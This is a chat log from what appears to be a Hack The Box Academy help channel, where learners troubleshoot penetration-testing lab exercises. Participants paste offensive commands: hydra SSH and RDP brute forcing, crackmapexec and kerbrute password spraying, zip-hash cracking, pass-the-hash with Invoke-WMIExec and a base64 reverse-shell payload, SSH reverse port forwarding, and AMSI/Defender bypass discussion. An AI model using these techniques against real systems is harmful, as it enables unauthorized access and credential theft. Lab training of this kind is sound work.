#modules

1 messages · Page 349 of 1

neon furnace
#

I still don't know how can the same payload work on local and not on the remote target, but I found a bypass I guess by changing the payload

#

It has nothing to do with perms...

#

ok, maybe I understand now

dapper moth
reef magnet
#

I'm on the Penetration Testing path, in the "Getting Started" module, specifically on the "Web Enumeration" page. I'm using DirBuster to enumerate directories and have found two paths so far:

http://94.237.60.154:49669/index.php
http://94.237.60.154:49669/wordpress

However, on the WordPress page, I can't select a language. I'm not sure how to proceed with the questions and could really use some hints. Any help would be appreciated!

neon furnace
#

but makes sense what you write, just not in this context for me

dapper moth
#

There is a note in one of the sections about it

neon furnace
#

well I got through the first hoop, so I may DM you afterwards if you don't mind

#

probably not today tho

coral verge
#

@ocean night I would like to apply for a refund. I accidentally purchased the Gold Annual Subscription without realizing that I had not canceled my subscription. Due to work reasons, I will not be using it for the time being. Please assist with the refund, thank you.

ocean night
#

Why pinging me?

coral verge
#

Because I looked at the historical messages, you had helped with it before, and it caused you a bad feeling. I'm sorry.

ocean night
#

Sorry, I just keep getting pinged left right and center

#

But yeah, speak with support

#

They will help you if they can.

#

Note it is late in the day, so there may be a delay in response time.

coral verge
#

thank you so much

ocean night
#

No problem

high gorge
#

I'm currently going through the Network Enumeration with NMAP module, and I can't seem to get tcpdump to pick up the three-way handshake from the nc -nv command

#

What are some of the most common errors here that I might be missing?

shut quest
high gorge
#

Is the correct interface the target IP and the IP of my VPN connection? Does the order matter?

#

(First time asking a question, so I don’t know how vague I need to be for other’s sake)

#

As far as the port, I think this instance is… well, very in-your-face about it

shut vapor
#

Sorry, apparently I wasn't scrolled all the way down and didn't see Gubarz's reply already.

#

The VPN interface is likely "tun0". You can see all your interfaces with "ip addr" or "ip link" commands.

high gorge
#

Time to reflect and understand why that was the case

smoky turtle
#

How do I copy payloads from modules into the pwnboxes?

#

Ctrl C doesnt work lol

distant trellis
#

Why are some modules sooo expensive?? Like they're based on cubes amd cubes are expensive making them expensive

plain trellis
smoky turtle
#

Does not,

#

Its weird I somehow did it once but it only copied like half of the payload

rustic sage
#

Does anyone know why I have 4 different terminals all running hydra -t 48 in Kali Linux and Kali vm still shows CPU is at 1%?

#

And as always hydra is taking forever

terse sedge
#

Is there a subnet that I can whitelist in a firewall to alleviate any connectivity issues with the HTB content?

ocean night
#

Not currently I'm afraid @terse sedge - I don't believe our IP blocks are contiguous at the moment, but you could always resolve the edge server defined in your ovpn file and whitelist that

#

All web services go through cloudflare, so you may be able to get a list of subnets from them.

#

What type of connectivity issues are you facing?

#

If you're talking about the IPs within the labs once connected to the VPN, I can get those for you.

#

Is it academy you are having issues with @terse sedge ?

#

..and if so, any specific subnet that's giving you trouble?

#

...ok, well ping me if you are still having issues and need the subnets I guess

#

(although the subnet routes are pushed to you when connecting to the VPN server)

#

..and they transit through the VPN connection on your host

#

so unless you have a very restrictive local firewall, I don't think a firewall would be causing you issues

dark hedge
#

please put module name, section name, question, etc. so people can help out more easily

teal sparrow
#

its command injection the link is there. there is only 1 question, bypassing blacklisted commands

dark hedge
#

it's harder for people on mobile to use the link

ocean night
#

That's a Tier 2 module

#

Please avoid posting any direct spoilers like that

teal sparrow
#

lol htb academy doesnt work on mobile before me

ocean night
#

Rather ask for generic advice, or for someone to DM to help advise.

teal sparrow
#

💀

#

alr

ocean night
#

ty

fallen fjord
#

Anyone struggling with the academy lately? it just keeps crashing, I want to use my own parrot box and the VPN servers just not working, when it comes to file transfer onto target it takes forever if it even completes, is it just me?

solar pecan
sonic plover
#

Hi, I am currently following the “Password Attacks: Attacking SAM” module. I was replicated the steps up till creating the share with smbserver.py. However when I try to move the files from the rdp machine, I keep encountering the access denied error on the rdp machine. Any advice on how to resolve this?

fallen fjord
#

Shame it always feels when I try use my own box i get so limited, files not transfering, when solving a box, a web vulnerability for initial access not working as it should

knotty gust
# sonic plover Hi, I am currently following the “Password Attacks: Attacking SAM” module. I was...

Double check the command you used to spin up your SMB server. The command they have in the module has the writer's home directory. Double check and make sure you're using your home directory instead.

The command in the module: sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/
The command modified to use my home directory (for example): sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/miaha/Documents/

cold star
#

Anyone knows how to fix this error? I am doing bleeding edge vulnerblity of active directory enumiration and attacks module I have succesfully taken the certificate of the dc but can't get that saved to a cache file I have tried creating new certificate and added that also but same error

vernal glen
#

I can’t use general do I will ask here how should I start learning to hack ? Like if there non buyable stuff that I can use things like that

compact patrolBOT
vernal glen
#

Thanks

rustic sage
#

Is there a way to have two boxes open at the same time?

hazy notch
#

Hey! I have looked at all the open ports and searched for an exploit for each of the services but no luck... Would you have another insight? Thx!

viral snow
#

Were you able to figure it out? I'm stuck.

rustic sage
#

is this normal output from hydra?

scenic plover
rustic sage
#

Password attacks labs easy

scenic plover
# rustic sage Password attacks labs easy

My bad I thought you were in Mutated passwords. Sorry. Let me look at this again, and then give you a sanity. I assumed you were in password mutations because that's where most individuals have the issue with the time running for a long time

#

thats on me

rustic sage
#

Yea yea I left that module run for like 20 hours

#

Then I woke up and saw the creds

tepid hemlock
#

did you try using the pwn machine (the web based machine)?

#

I think you have access x hours a day or something

rustic sage
tepid hemlock
#

smells like something real wrong with your VM/connection

tepid hemlock
tepid hemlock
#

from what I understand l0s saying

rustic sage
#

But at this point I don't trust it anymore

tepid hemlock
#

let me see if I have enough cubes to try that lab 😄

rustic sage
#

Lol thx

tepid hemlock
#

ah damn, not enough cubes 😦

#

oh well, I am sure someone has done it, otherwise plenty people in here seem to have done Password Attacks

rustic sage
#

Ye ye it's not a problem

#

Thx

scenic plover
scenic plover
rustic sage
#

Ye same

#

Fuck tech i wish I was a farmer

#

WHY DOES IT LOOSE CONNECTION

scenic plover
rustic sage
scenic plover
#

Turn down the threads to 34

#

There's a threshhold it hits and begins to become overwhelmed

rustic sage
#

Aight I'm not touching it again for 5 minutes

#

I'll eat a croissant

#

Fuck this

#

It's still going

scenic plover
rustic sage
#

Okay

#

I'm fucked either way bc if it works there's something wrong with my VM if it doesn't work there's something wrong with my laptop

#

Or connection

scenic plover
#

from forum posts

#

And then think it has to iterate over all those usernames

rustic sage
#

Ye

#

The thing that's fucked is that I can't even do another box I'm stuck waiting

vivid sigil
#

HI
Pivoting, Tunneling, and Port Forwarding > Remote/Reverse Port Forwarding with SSH

when i running backupscript.exe to get revrseshell it didnt work, i think that because i didnt put the right ips on this i used this

ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.132.37 -vN

what should i replace on these < >

ens192:10.129.132.37
ens224:172.16.5.129
windows:172.16.5.19

rustic sage
#

I would have prob been halfway through attacking common service module by now if it didn't disconnect as soon as I spawn another target

rustic sage
#

Same

scenic plover
rustic sage
scenic plover
#

Got it

#

So just give it some more time

tropic tulip
#

im having a little issue in linux fundamentals...the password to ssh is coming back wrong

scenic plover
tropic tulip
#

i didnt know where else to post/ask 🤷‍♂️

dapper moth
#

Time to wait the subscription hit again! hugthebox

rustic sage
scenic plover
tropic tulip
#

i guess theres no help for me since its a password and its failing...trying to respawn machine....see if that fixes the password "bug"

respawn fixed it

rustic sage
scenic plover
rustic sage
scenic plover
#

swap it to password.list

rustic sage
#

I tried it finishes very quickly and gave zero creds

scenic plover
#

Try it one more time. with the threads at 34

rustic sage
#

Ok

scenic plover
#

Let me know if it finishes quick again

rustic sage
#

It's doing its thing

scenic plover
#

Perfect. I'd put something on and chill for a minute if it doesn't finish unexpectedly.

rustic sage
#

I'm watching narcos

#

And petting my cat

scenic plover
#

Ayyye, Pablo the goat

rustic sage
#

@scenic plover it got to 11k tries done out of 20k and then is disconnected

#

@real delta what do you normally use for brute forcing in password attack easy lab

real delta
#

I haven't done the lab

scenic plover
rustic sage
#

Tried

#

Restore file not found

sacred gull
#

I seem to be having alot of issues with the Evading AD module, in open source software all amsi bypasses dont work because the Load() always gets called out

scenic plover
#

Yeah, I used the username list they give you in the resource and the password.list. I used 34 threads too

#

Took me a total of 15 minutes

rustic sage
#

What the fuck

scenic plover
#

What does it say when you get disconnected?

#

Also could the target have expired?

rustic sage
#

Disable child bc of too many error

rustic sage
#

Btw is there a way to make hydra more visually catching? It found the creds but kept going and I didn't see them

#

It says it took 12 minutes but I don't believe it

scenic plover
analog urchin
#

Using Web Proxies, Burp Intruder

Guys, (Excuse my english) using burpsuite intruder: the § symbol, where should it placed exactly? or used?

I am supposed to look for a '.html' file in the /admin directory.

But the examples I see in the session do stuff like this:

GET /§DIRECTORY§/ HTTP/1.1

Should I be doing something like this?

GET /admin/§whatever§ HTTP/1.1

rustic sage
rustic sage
#

Thank you brother

#

💪

dapper moth
#

If you change one small thing, it will not generate the flag

sacred gull
scenic plover
# rustic sage Yes

Awesome. Just making sure I didn’t waste all of your time. 🤣 If you use -f it should stop upon finding the first valid set of creds.

sacred gull
dapper moth
#

I got stopped a couple of times because of compiling it in a .NET console app instead of the framework

sacred gull
#

Ah maybe thats the issue, its just compiled in VS code

dapper moth
#

Even with codes that achieved what I wanted in different ways

rustic sage
dapper moth
#

I got a couple of different scripts that spawned and injected in a process

#

And only one thing would get the flag

rustic sage
#

When it says denied access - public key if I remember correctly it's in the nmap scan or something?

scenic plover
sacred gull
#

Still cant get the static analysis flag becuase it never turns up

dapper moth
#

I used that PowerShell C# in a ps1 script

sonic ridge
#

I'm in the broken authentication module and on the authentication bypass via parameter modification. I fuzzed for the user id and got the flag but the flag doesnt work. it says incorrect flag.

dapper moth
#

Think it’s the same as rasta-mouse’s amsiscanbuffer

dapper moth
#

Also got hanged in this

sacred gull
#

Yeah I did, copied the script exactly in the end, and on the host it scanned and said it passed all checks but no flag was produced 🙃

#

Support said they dont help with modules so it wont be an issue till I complete the AD pathway

sacred gull
sonic ridge
#

I dont understand why the flag I got doesnt work

sacred gull
#

I have to assume its something I am doing but I don't understand why none of the patches are working

sonic ridge
#

Is it possible for the module to give me the wrong flag or something?

sonic ridge
#

nevermind I got it. I was copying and pasting and it had a space at the beginning

sacred gull
#

It seems the amsi bypass is working but the script can never run

#

Also sidenote, you cant run .exe as a local group policy so the method of running seatbelt.exe never works (obfuscated past defender)

#

I would love someone to come correct me but for now I think this module is broken

cloud urchin
rustic sage
#

Guys I'm in password attack medium lab. I found the .zip file but I zip2john isn't cracking it idk why

cloud urchin
quasi wave
#

hi how many processes should I have going at once if I want this ssh attack to go quickly? this is for the Password Attacks Module in the Linux Credential Hunting section:

hydra -L username.list -P password.list 10.129.194.188 ssh -t 16
quasi wave
#

but I tried four and it was taking days to finish like it wouldn't finish in time

cloud urchin
#

probably brute forcing the wrong service or using a wordlist that doesn't contain the passwd then

quasi wave
#

I used the list in the resources section

rustic sage
#

But how would that help? It's a .zip file not an ssh key

cloud urchin
rustic sage
#

I did zip2john and made zip.hash then used John --wordlist= rockyou.txt zip.hash

#

Doesn't crack it, I also tried password.list provided in resources and also pws.list

#

I'm also trying with hashcat but same

cloud urchin
rustic sage
#

Wtffffff bro

#

It's gonna take 4 hours again

cloud urchin
rustic sage
#

Oh it was very quick : )

#

Thank you super nuts

rocky estuary
#

guys i'm doing the second skill assessment from attacking common web apps and i got the flag and everything but i'm stuck at the first question "What is the URL of the WordPress instance? " what i'm missing here ?

fallen merlin
#

guys, does anynone have experience with burp?? im trying to use the intruder for the first time, but the payload position is greyed out, cant use it

cloud urchin
fallen merlin
#

yes, that's the one im using to study

#

but my burp is not allowing me to use the payload intruder

#

idk if they removed this from the free version

cloud urchin
#

pretty sure they wouldn't do that

#

did you send something to intruder first?

fathom pendant
#

^

fallen merlin
#

nvm, they simplified, i missed the word ' list '

#

list is empty, not the position, mb

#

thanks a lot man

#

im a newbie here lol

cloud urchin
#

we're all newbies and here to learn

#

no shame

normal sand
quasi wave
#

hi this command didn't work:

    5  hydra -L username.list -P password.list 10.129.194.188 ssh -t 4
    6  hydra -L username.list -P password.list 10.129.194.188 ssh -t 16
    7  hydra -L username.list -P password.list 10.129.194.188 ssh -t 36
    8  hydra -L username.list -P password.list 10.129.194.188 ssh -t 64

I just get this:

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-06 23:22:56```
#

this is for the Password Attacks Module's Linux Credential hunting section

#

am I not supposed to use hydra?

sacred orchid
#

Hello, im following the Active Directory Enumeration & Attacks module but i'm having trouble connecting to most windows machines.

The boxes of this module seem quite unstable as they sometimes work flawlessly, but more often I can't connect to them at all.
The problem persists when trying different rdp tools such as xfreerdp and remmina or when switching between the pwnbox or my own kali machine. My method now is spawning the target and seeing if i can connect to it normally after I let it boot up for about 3-5 mins.
I was wondering if i'm doing something wrong and what I should do differently.

I would say it does allow me to connect once every 6 reboots

sacred orchid
#

Oh i might have found something but I haven't thoroughly tested it yet.
Using the setting /gfx:AVC420 to minimize advanced features seems to be working somehow

eternal vigil
#

I tried WMI but even that aint working for me

#

i am on password attacks , pass the hash and stuck on the last question i am not able to connect to DC01 , nc aint responding i tried both SMB and WMI

eternal vigil
#

also try to work on a faster protocol ssh is slow and -t 4 is the max it can process the higher -t wont work

eternal vigil
fervent iris
#

is there a legal issue with recording the academy material for educational (explanatory) purposes and publishing them online?
if yes, does avoid mentioning HTB academy solves the issue?

urban elk
#

as far as I understand, sharing anything above tier 0 content is against terms of service

fervent iris
autumn pilot
#

if you loose a shoe and you start looking for it, how would you know it is yours when you find it

fervent iris
urban elk
fervent iris
urban elk
#

hmn

#

"I just find writing <-> is the best way to assure <yourself> that you understand a topic very well" -> I definitely agree

#

by definition though, it wouldn't rot from then. It would have served its purpose. It might still serve more purpose later on when you come back to your private notes

#

if you are honest about it though, and rephrase it: "so if I can benefit from it too, why not publish it?" -> because it is against terms of service

#

if for the first sentence you actually mean "I find that writing content is the best way to assure <others, like an employer> that you understand a topic very well", I disagree, because you can't prove you didn't regurgitate it. The best way to assure others is by demonstrating the skill

fervent iris
urban elk
#

ok, that's fair enough. Still, it is against terms of service

#

so that should be that

rustic sage
#

Hii

#

Help me

#

If here someone is a hack who can help me please dm

unique rock
#

hey guys it this a channel for discussing the boxes, are i am in wrong place?? thank you

urban elk
#

recently released boxes have their own dedicated channels too (by name), you'll see them

junior marten
#

is any can help me solve this problem

urban elk
fervent iris
eternal vigil
grand portal
#

Module: Attacking common services
Section: Attacking SQL Databases

Task: What is the password for the "mssqlsvc" user?

what I've tried?

  1. I've tried impersonating(i get permission restriction, unable to imepersonate to sa user), retrieving hash ( again lack of permission to retrieve hash, ```1> EXEC master..xp_subdirs '\10.129.225.129\share'
    2> GO
    Msg 229, Level 14, State 5, Server WIN-02\SQLEXPRESS, Procedure master..xp_subdirs, Line 1
    The EXECUTE permission was denied on the object 'xp_subdirs', database 'mssqlsystemresource', schema 'sys'.
rustic sage
#

Hii help

grand portal
rustic sage
grand portal
#

I can't

rustic sage
grand portal
#

This is module section, you should probably hit up in general section.

rustic sage
#

I don't have access

eternal vigil
storm elk
rustic sage
storm elk
urban elk
#

I don't know about you but I find it pretty cool that when we need Batman we activate the Bat-signal, but when Batman needs help he comes to HTB 😎

rustic sage
visual umbra
rustic sage
#

Got the problem with module Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows when trying to crack the tgs with hashcat or john. Neither is working. Please help

uneven cobalt
#

Intro to assembly language

Debugging with GDB section
Find hex value in 'rax' in instruction <_start+16> question

I tried hex value i got once reached _start+16 with the help of break command

But it doesn't take the value i entered any clues

median gale
#

Keep getting con reset when trying to connect to port 800 wtf am i doing wrong? Reseted the target 3 times already

spare smelt
#

Guys

#

Who knows about the Nuri smart CIU

median gale
autumn pilot
#

check the protocol

median gale
#

https?

autumn pilot
#

Web applications run primarily on two protocols, unencrypted and encrypted

median gale
#

Why would it ever work on https on a htb lab?

lapis musk
#

Hi everyone I am currently on the Windows Attacks & Defense module and I cannot RDP into the first box (Kerberoasting), it says wrong credentials

#

I had no problems with the previous modules which required RDP as well

median gale
#

I guess it did...

#

@autumn pilot How did you know?

brazen plover
#

Good morning guys, can someone help me with the signature wrapping attack? I've been trying to modify this XML for a few days but it's always giving problems

dapper island
#

Hi i am looking for CTF team

acoustic owl
cold star
#

INFO:minikerberos:Requesting TGT
Traceback (most recent call last):
File "/opt/PKINITtools/gettgtpkinit.py", line 349, in <module>
main()
File "/opt/PKINITtools/gettgtpkinit.py", line 345, in main
amain(args)
File "/opt/PKINITtools/gettgtpkinit.py", line 315, in amain
res = sock.sendrecv(req)
File "/usr/local/lib/python3.9/dist-packages/minikerberos-0.2.20-py3.9.egg/minikerberos/network/clientsocket.py", line 87, in sendrecv
minikerberos.protocol.errors.KerberosError: Error Name: KDC_ERR_PADATA_TYPE_NOSUPP Detail: "KDC has no support for PADATA type (pre-authentication data)"

#

Does anyone know how to fix this? Bleeding edge vulns of ad enumeration and attacks

brazen plover
#

@acoustic owl can u give me a hint?

rustic sage
#

Heyy guys do u know a guy named big brain here

storm elk
#

this is not a channel to just chat about random things @rustic sage

acoustic owl
brazen plover
brazen plover
#

I’m not, im doing manually

acoustic owl
#

SAML?

brazen plover
#

Yes

#

Signature wrapping attack

normal sand
#

Was just performing a fresh kali install, but having this issue for the first time. It's affecting the shared clipboard and prolly other functionality. Anyone know how to fix this? I was just installing the guest additions for this virtual machine in virtualbox.

Also, this was the first time I couldn't run the VBoxLinuxAdditions.run directly, I had to copy all the contents from the cd image to a folder and then run it since it kept saying "permission denied" (yes, I tried running it with sudo and changing the permission, but changing the permission prompted me with "read-only file system").

Also, if I'm in the wrong channel, sorry, please direct me to the right one. Thanks!

acoustic owl
acoustic owl
eternal vigil
hazy notch
frank sun
#

Hey guys!
https://academy.hackthebox.com/module/143/section/1485

Performing a Reverse Search & Mapping to a GUID Value -


An error occurred while enumerating through a collection: The (&ObjectClass -like 'ControlAccessRight') search filter is invalid..
At C:\Tools\PowerView.ps1:6664 char:13
+             $Results | Where-Object {$_} | ForEach-Object {
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (System.Director...sultsEnumerator:ResultsEnumerator) [], RuntimeException
    + FullyQualifiedErrorId : BadEnumeration```
can someone please help me on this (not much familiar with PS)?
midnight galleon
#

Sanity check on Pivoting skill assessment?

#

I made a pivot with metasploit and did a ping sweep from meterpter but after setting up the socks server and adding the subnet to the routing table nmap still just says the host is down

sick depot
#

Can anyone help with attacking lsass section in pentest job role, I have vendor hash but seems to produce a different password everytime I run hashcat non of which seems to be correct

urban elk
#

feel free to dm with the hash you found

#

I completed this a couple days ago and still have the history in my terminal

sick depot
#

Thanks 1 min

midnight galleon
#

literally did everything and tried with both socks4 and socks5

eager siren
#

hello i am at Attacking Enterprise Networks Lateral Movemnt at Post-Exploitation/Pillaging
I added my user to the Administrators using the vulnerability on the program that the module says, but i cant open the cmd or powershell as Administrator to run mimikatz for some reason, do i have to do smothign else ? Like use the kdbx file?

#

i had to logout login nevermind

normal sand
frank sun
#

Yes, works only with xfreerdp

normal sand
frank sun
#

It will show blank black screen sometimes, try hitting some random keys

normal sand
#

Trying the command you were having an issue with now.

frank sun
#

Let me know

normal sand
frank sun
#

Ohh, I'll try resetting machine

normal sand
# frank sun Ohh, I'll try resetting machine

According to the error you received, it has to do with the filter part of the command. I tried running your output through ChatGPT, it suggested enclosing it in double quotes like this:

-Filter "ObjectClass -like 'controlAccessRight'"

So, you could give that a shot. But resetting should prolly fix the issue you're having.

frank sun
#

I'll try both, thanks 👍

normal sand
pine dune
#

hi guys

normal sand
pine dune
#

anyone know why Im getting this error?

normal sand
# pine dune

Might be because of the extra space before -u. Try and lmk.

frank sun
#

Sure, will do once I'm back. prayge

pine dune
rare swan
#

How is the online tool called again to encode/decode all kinds per drag & drop - cant figure it out yet - thx

pine dune
#

thats my command

normal sand
#

Try using netexec instead. Crackmapexec is no longer maintained iirc. But it should still work...

pine dune
dark hedge
pine dune
#

ahh ok

#

idk why htb academy was giving the command for crackmap, why would they put something outdated

dark hedge
#

virtually the same as CME, you can try the exact same command

pine dune
#

tbh Im returning to the module after a long time

normal sand
# pine dune

I can't tell much from the error, prolly something to do with the python libraries maybe.

dark hedge
#

i know they're already doing it for CBBH

cold star
pine dune
storm elk
cold star
midnight galleon
pine dune
#

Hi guys for the password reuse/default passwords module does anyone have any clues they could give me pls?

wicked solstice
#

try this

pipx install git+https://github.com/byt3bl33d3r/CrackMapExec
fathom pendant
#

And archived

#

Use netexec instead

fathom pendant
pine dune
worn matrix
#

does anyone have a powershell script that can start an http server?cus with double-pivoting i have really problem ;p

worn matrix
#

http server

strange pivot
#

try using Start-HTTPListener, I know you can create a webshell on a windows server with PowerShell PSWA as well

#
$httpListener = New-Object System.Net.HttpListener
$httpListener.Prefixes.Add("http://localhost:9090/")
$httpListener.Start()

New-NetFirewallRule -DisplayName "AllowTestWebServer" -Direction Inbound -Protocol TCP –LocalPort 9090 -Action Allow
worn matrix
#

i will be able to download from this?

#

i ll go check it

brazen plover
#

Can someone help me with this Signature wrapping attack? I'm really stuck and I don't know where I'm going wrong in XML

strange pivot
#

just use copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\

worn matrix
strange pivot
worn matrix
#

the last machine,isn't able to connect to an smb

brazen plover
#

I really don’t have any idea

analog dock
strange pivot
strange pivot
sick depot
#

crackmapexec smb 10.129.216.193 -u jmarston -p /usr/share/wordlists/fasttrack.txt

#

anyone any idea why this wont work on attack box

strange pivot
sick depot
#

command not found

strange pivot
sick depot
#

its ok ive just learned CME is depreaceated

strange pivot
#

Using a Bash one-liner for the Attack

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done

Kerbrute

kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1

CME

sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +

Validate the creds:

sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123
strange pivot
strange pivot
sick depot
#

thanks bro sorted now

median gale
#

Trying to exploit PRTG. Why is it dropping connections ?

acoustic owl
#

Not every machine responds to a ping

#

Have you tried the PwnBox?

median gale
frank sun
#

I imported powerview.ps1 module, am I missing anything else? when I run it for the first time, it automatically loads the AD module.

teal sparrow
#

can sm1 dm me and help me on the command injection module just to avoid spoilers here

frank sun
normal sand
frank sun
#

machine just spin up, trying one more time

#

still no luck

normal sand
#

That's really weird...

normal sand
frank sun
#

same error

normal sand
frank sun
#

yup, worked WIHOUT* filter

normal sand
#

What did you change to make it work?

frank sun
#

it was filter's mismatch i guess

#

ran this - Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl

normal sand
#

Filter's mismatch? That's strange...

frank sun
#

when time comes, will learn filters later

normal sand
#

Hmm... What I find strange is that the syntax of the command you originally used was perfect, I even copy-pasted it, and it worked for me.

#

The target should be standard, so not sure why...

frank sun
#

yeah, I'm confused too

normal sand
frank sun
#

nope, I got it from Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}

normal sand
#

I'm not on my laptop rn so I can't check the output of that, and whether it's the same as the example.

#

I used the GUID from the example. Maybe it didn't work because the GUID was different.

normal sand
normal sand
#

It's been a while since I did the module, memory's not the freshest, but ain't that a separate thing from the thing he's trying to reverse map?

frank sun
#

ObjectAceType property is returning a GUID value

teal sparrow
normal sand
#

@frank sun when you use the GUID from the example snippet itself, does the command work?

frank sun
#

both example and from target machine - sid,guid,etc. almost everything is same

normal sand
frank sun
#

I believe its nothing to do with guid, more with filter syntax

normal sand
#

Yeah, I've got no clue then 💀

#

If someone figures this out, please ping me. I'd like to know why.

frank sun
#

yup

#

CN=Dana Amundsen - combination could be anything??

#

am I missing any step here? or is it just based on the famous <first-name-first-letter><last-name> (or vise versa) guess

eternal vigil
fathom pendant
frank sun
fathom pendant
#

Sure

#

The $sid is the important bit from the message i deleted btw

frank sun
rustic sage
#

Do I let it run

eternal vigil
#

Could anyone please help me with this Password Attacks / Pass the Hash , i am stuck here for a while now , i have already tried a few more variations by switching .htb to .local in domain name and also switching target by ip/dc01 and rechecked the base64 command , still nc isnt listening and making connection , nothing is working , could anyone pls tell what am i missing here ?
it would be a great help , thankyou

frank sun
eternal vigil
#

isnt working

#

nc -lvnp 8001

dreamy mountain
#

need help with windows fundementals module

eternal vigil
#

@frank sun

dreamy mountain
#

im trying to smbclient to it using smbclient -L IP -U htb-student but it just says NT_STATUS_UNSUCCESSFUL

#

I have it running and the windows instance running idk why its saying that?

#

do I need another ip other than the ip i used for xfreerdp?

frank sun
#

where is your nc running?

eternal vigil
#

in my cmd

#

the compromised administrator machine

strange pivot
eternal vigil
#

@frank sun

strange pivot
eternal vigil
#

yes

frank sun
#

did use powershell #3 (Base64)?

eternal vigil
#

yes

#

my base64 almost match the one given in the module

#

not the end tho idk why even tho the ip and port are same

strange pivot
#

This is what my notes said for this part: REV SHELL NOT WORKING? type ipconfig and try the other local ip for the rev shell. also try press enter on the netcat session

eternal vigil
#

so i tried to ditch mine and run the exact same module command too but even that didnt work

strange pivot
#

so maybe its the other local ip you need to use?

eternal vigil
strange pivot
#

This is what my notes say as well: Note: This is to connect from one windows machine to another HOST:MS01 to DC01, you specify the hostname as the target not the IP run the nc.exe on your other windows machine.

frank sun
#

you might be trying an IP of public that you use for rdp that won't work, try source listener IP from same domain IP

eternal vigil
proud cloak
#

Hi all need a little help with a question of active directory powerview skill assessment, the question is: find sid of rachel.flemmings and my question is where is rachel.flemmings ??

strange pivot
eternal vigil
#

well i will try again with your recommendations gimme a min

eternal vigil
#

like i had the same ip as the module 172.16.1.5

#

and used same port too 8001 but my base64 encoding was still diff

eternal vigil
#

i didnt change any default settings , kept the encoding on nome and shell to sh

#

still i had a lil diff base64 i am not sure if it is meant to happen

#

idts it should but alr

frank sun
#

os - windows
powershell #3 (Base64)
ip - 172.16... (nc listening)
port - any (8001)

strange pivot
# eternal vigil idts it should but alr

for your target you've put the ip, do it like this:


Import-Module .\Invoke-TheHash.psd1
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e
eternal vigil
#

yes i have tried this too

#

but it wasnt working , i have tried both .htb and .local in domain name too

strange pivot
eternal vigil
#

while the base64 of module ends with yAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="

eternal vigil
heavy edge
#

the document reporting lab VM is terrible

#

its like a reallly shitty Parrot os that loads like its on dialup

twin cape
#

Good evening , could someone help with this :
How many files exist on the system that have the ".log" file extension?
locate *.log | wc -l
24
when i filled in the the the answer it says incorrect

strange pivot
#

try with sudo as well

twin cape
#

okay but before that command i did
find /etc/ -name *.log 2>/dev/null | grep system | wc -l
find -name *.log 2>/dev/null | grep system | wc -l

#

i got 0

frank sun
#

find did not return any system I guess

frank sun
twin cape
#

thanks it worked

#

it was 32

lone ferry
#

DCSync (module 143 in AD) is broken. The provided instructions don’t even work. Platform is worse each week.

autumn pilot
#

Perhaps providing some output of the commands you've run might help find the issue and resolve it

eternal vigil
#

@strange pivot @frank sun

autumn pilot
#

I've just tested the exercises in the DCSync section and everything is working as expected

eternal vigil
#

not working i tried ping and yes it is active

strange pivot
eternal vigil
#

@strange pivot i have rdp as administrator is it correct or should i try it w julio too so that cmd would be on her machine or i could just open cmd as julio using minikatz

quasi wave
eternal vigil
eternal vigil
#

i used that ip to rdp to the machine which is my attacker and target is still the one 172.16.1.5 i.e DC01

#

so i need to base64 encode that , no?

#

and then connect my main machine 10.129.164.187 to that

#

through nc'

strange pivot
eternal vigil
#

ok just a min

#

@strange pivot not working

strange pivot
#

check by its PID

eternal vigil
strange pivot
eternal vigil
#

last question

strange pivot
#

ok doing it now

strange pivot
eternal vigil
#

||xfreerdp /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453 /v:10.129.164.187||

rustic sage
#

Guys in password attacks hard lab I have to brute force rdp right?

#

I'm so fucking tired or waiting for brute forcing fk

#

It's literally eating half of my day

eternal vigil
#

it should not

#

all the brute force attacks are under 40 mins max

rustic sage
#

Fucking hydra

#

Can u rate modules

eternal vigil
quasi wave
#

hi I think I need to brute force the ssh connection for this section's flag. I have tried this but I think I am getting the brute-force format wrong:

hydra -l Will -x 5:9 ssh://10.129.208.34 -t 4
#

or like this:

hydra -l Will -x 5:9 10.129.208.34 ssh -t 4
eternal vigil
#

why dont we try ftp there aint it faster ?

quasi wave
#

its not about speed. I get a error when I try to brute force it and I think I am doing the command wrong

eternal vigil
#

pattern

quasi wave
#

I want to try any characters, numbers letters and symbols, but only try passwords with password length between 5 and 9

#

to speed it up a little

#

the hint says I need to brute force

#

I tried dictionary attacks and they didn't work too

#

even when I did it right

#

so dictionary attacks clearly aren't the answer here

rustic sage
#

Should I stop it?

#

I'm in password attacks hard lab

gray yacht
fathom pendant
rustic sage
#

Johanna

#

But it says account on ip might be valid but not active for remote desktop

fathom pendant
#

Just have patience

rustic sage
#

Oh okay so it's normal?

fathom pendant
#

That's just a default response

rustic sage
#

Aight aight thx

fading violet
#

One message removed from a suspended account.

#

One message removed from a suspended account.

#

One message removed from a suspended account.

gray yacht
quasi wave
gray yacht
quasi wave
gray yacht
winter schooner
#

